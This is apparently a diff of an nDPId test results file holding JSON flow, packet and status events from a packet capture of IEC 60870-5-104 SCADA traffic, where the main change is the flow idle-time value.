-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992782348,"flow_last_seen":1219992782348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992782348,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1219992782348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992782348,"pkt":"ABXFGNTMABNy14eKCABFAAAwbjdAAIAGQ5ysG\/htrBv4TwYpCWQN1WRMAAAAAHAC\/\/+4fAAAAgQFtAEBBAI="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1219992782348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992782348,"pkt":"ABNy14eKABXFGNTMCABFAAAwQZFAAIAGcEKsG\/hPrBv4bQlkBikE5Jl8DdVkTXAS\/\/8aCwAAAgQFtAEBBAI="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1219992782349,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992782349,"pkt":"ABXFGNTMABNy14eKCABFAAAobjhAAIAGQ6OsG\/htrBv4TwYpCWQN1WRNBOSZfVAQ\/\/9GzwAAAAAAAAAA"} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992782348,"flow_last_seen":1219992782350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992782350,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992819942,"flow_last_seen":1219992819942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992819942,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1219992819942,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992819942,"pkt":"ABXFGNTMABNy14eKCABFAAAwbkRAAIAGQ4+sG\/htrBv4TwYqCWRBsBqPAAAAAHAC\/\/\/OXQAAAgQFtAEBBAI="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1219992819943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992819943,"pkt":"ABNy14eKABXFGNTMCABFAAAwQZZAAIAGcD2sG\/hPrBv4bQlkBir5wu6KQbAakHAS\/\/\/l\/gAAAgQFtAEBBAI="} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1219992819943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992819943,"pkt":"ABXFGNTMABNy14eKCABFAAAobkVAAIAGQ5asG\/htrBv4TwYqCWRBsBqQ+cLui1AQ\/\/8SwwAAAAAAAAAA"} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992819942,"flow_last_seen":1219992819944,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992819944,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992231267,"flow_last_seen":1219992231267,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992231267,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1219992231267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992231267,"pkt":"ABXFGNTMABNy14eKCABFAAAwbS5AAIAGRKWsG\/htrBv4TwYgCWR6t61JAAAAAHAC\/\/8CpgAAAgQFtAEBBAI="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1219992231267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992231267,"pkt":"ABNy14eKABXFGNTMCABFAAAwQVVAAIAGcH6sG\/hPrBv4bQlkBiDrZdPBeretSnAS\/\/9DbQAAAgQFtAEBBAI="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1219992231267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992231267,"pkt":"ABXFGNTMABNy14eKCABFAAAobS9AAIAGRKysG\/htrBv4TwYgCWR6t61K62XTwlAQ\/\/9wMQAAAAAAAAAA"} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992231267,"flow_last_seen":1219992231283,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992231283,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992393215,"flow_last_seen":1219992393215,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992393215,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1219992393215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992393215,"pkt":"ABXFGNTMABNy14eKCABFAAAwbYNAAIAGRFCsG\/htrBv4TwYiCWRtLtqlAAAAAHAC\/\/\/i0AAAAgQFtAEBBAI="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1219992393215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992393215,"pkt":"ABNy14eKABXFGNTMCABFAAAwQXdAAIAGcFysG\/hPrBv4bQlkBiJI3nuobS7apnAS\/\/8eOQAAAgQFtAEBBAI="} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1219992393216,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992393216,"pkt":"ABXFGNTMABNy14eKCABFAAAobYRAAIAGRFesG\/htrBv4TwYiCWRtLtqmSN57qVAQ\/\/9K\/QAAAAAAAAAA"} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992393215,"flow_last_seen":1219992393217,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992393217,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992486295,"flow_last_seen":1219992486295,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992486295,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1219992486295,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992486295,"pkt":"ABXFGNTMABNy14eKCABFAAAwbaNAAIAGRDCsG\/htrBv4TwYjCWQlpaXOAAAAAHAC\/\/9fMAAAAgQFtAEBBAI="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1219992486296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992486296,"pkt":"ABNy14eKABXFGNTMCABFAAAwQX5AAIAGcFWsG\/hPrBv4bQlkBiP13h8HJaWlz3AS\/\/9KOQAAAgQFtAEBBAI="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1219992486296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992486296,"pkt":"ABXFGNTMABNy14eKCABFAAAobaRAAIAGRDesG\/htrBv4TwYjCWQlpaXP9d4fCFAQ\/\/92\/QAAAAAAAAAA"} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":49,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992486295,"flow_last_seen":1219992486297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992486297,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":56,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1219992231267,"flow_last_seen":1219992392222,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":87,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1219992546983,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1568,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992590188,"flow_last_seen":1219992590188,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992590188,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1219992590188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992590188,"pkt":"ABXFGNTMABNy14eKCABFAAAwbcVAAIAGRA6sG\/htrBv4TwYkCWQxVG2fAAAAAHAC\/\/+LrwAAAgQFtAEBBAI="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1219992590188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992590188,"pkt":"ABNy14eKABXFGNTMCABFAAAwQYVAAIAGcE6sG\/hPrBv4bQlkBiSd+ybXMVRtoHAS\/\/\/GywAAAgQFtAEBBAI="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1219992590188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992590188,"pkt":"ABXFGNTMABNy14eKCABFAAAobcZAAIAGRBWsG\/htrBv4TwYkCWQxVG2gnfsm2FAQ\/\/\/zjwAAAAAAAAAA"} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992590188,"flow_last_seen":1219992590189,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992590189,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 
+00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":73,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1219992393215,"flow_last_seen":1219992485282,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1219992650548,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1570,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":80,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1219992486295,"flow_last_seen":1219992589197,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1219992710502,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1571,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992782348,"flow_last_seen":1219992782348,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992782348,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1219992782348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992782348,"pkt":"ABXFGNTMABNy14eKCABFAAAwbjdAAIAGQ5ysG\/htrBv4TwYpCWQN1WRMAAAAAHAC\/\/+4fAAAAgQFtAEBBAI="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1219992782348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992782348,"pkt":"ABNy14eKABXFGNTMCABFAAAwQZFAAIAGcEKsG\/hPrBv4bQlkBikE5Jl8DdVkTXAS\/\/8aCwAAAgQFtAEBBAI="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1219992782349,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992782349,"pkt":"ABXFGNTMABNy14eKCABFAAAobjhAAIAGQ6OsG\/htrBv4TwYpCWQN1WRNBOSZfVAQ\/\/9GzwAAAAAAAAAA"} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992782348,"flow_last_seen":1219992782350,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992782350,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1219992819942,"flow_last_seen":1219992819942,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1219992819942,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1219992819942,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992819942,"pkt":"ABXFGNTMABNy14eKCABFAAAwbkRAAIAGQ4+sG\/htrBv4TwYqCWRBsBqPAAAAAHAC\/\/\/OXQAAAgQFtAEBBAI="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1219992819943,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1219992819943,"pkt":"ABNy14eKABXFGNTMCABFAAAwQZZAAIAGcD2sG\/hPrBv4bQlkBir5wu6KQbAakHAS\/\/\/l\/gAAAgQFtAEBBAI="} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1219992819943,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1219992819943,"pkt":"ABXFGNTMABNy14eKCABFAAAobkVAAIAGQ5asG\/htrBv4TwYqCWRBsBqQ+cLui1AQ\/\/8SwwAAAAAAAAAA"} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1219992819942,"flow_last_seen":1219992819944,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1219992819944,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1578,"dst_port":2404,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":107,"source":"iec60780-5-104.pcap","alias":"nDPId-test","packets-captured":107,"packets-processed":106,"total-skipped-flows":0,"total-l4-data-len":343,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":6,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":36,"global_ts_msec":1219992852463} 
-00693{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":117,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1219992590188,"flow_last_seen":1219992781349,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1219992910077,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1572,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":120,"source":"iec60780-5-104.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1219992782348,"flow_last_seen":1219992818955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1219992935600,"l3_proto":"ip4","src_ip":"172.27.248.109","dst_ip":"172.27.248.79","src_port":1577,"dst_port":2404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 
